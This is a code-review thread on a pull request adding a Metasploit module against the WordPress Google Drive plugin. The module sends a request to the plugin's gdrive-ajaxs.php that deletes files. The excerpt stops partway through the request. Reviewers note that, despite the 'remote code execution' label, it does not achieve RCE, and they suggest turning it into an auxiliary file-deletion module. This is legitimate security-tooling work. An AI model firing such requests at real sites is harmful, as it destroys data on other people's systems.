modules/exploits/unix/webapp/wp_drive_rce.rb

```diff
@@ -0,0 +1,54 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HTTP::Wordpress
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Google Drive for WordPress',
+      'Description'    => %q{
+        This module exploits an arbitrary remote code execution (RCE) in the WordPress
+        plugin Google Drive.
+      },
+      'Author'         =>
+        [
+          'Lenon Leite', # Vulnerability Discovery
+          'Mateus Lino  <dctoralves[at]gmail.com>'  # Metasploit Module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['URL', 'https://www.exploit-db.com/exploits/44435/']
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => 'May 08 2018')
+    )
+  end
+def exploit
+  send_request_cgi({
+        'method'   => 'POST',
+        'uri'      => "wp-content/plugins/wp-google-drive/gdrive-ajaxs.php",
+        'data'     => post_data,
+        'vars_get' => {
+          'ajaxstype' => 'del_fl_bkp',
```

Comment:
Is there another `ajaxstype` that can get you RCE?

Reply:
No @wvu-r7 ... but i continue research ...

Reply:
I'll go upload news exploits for wordpress.
😃

Reply:
Probably best to change this to an auxiliary module if it doesn't take a payload. :)

Reply:
Ok, what this is best category for change ? Auxliary/.. ? 
tks =)

Reply:
It is if you're not able to get a shell with it yet. But hopefully that will come!

Reply:
The best chage is  move for  auxiliary/gather ? When i move i need send new pull request ?

Reply:
I think `auxiliary/admin` is better for file deletion and related. You can just add commits to this PR. No need to open a new one!

Reply:
ok, i'll go change. tks !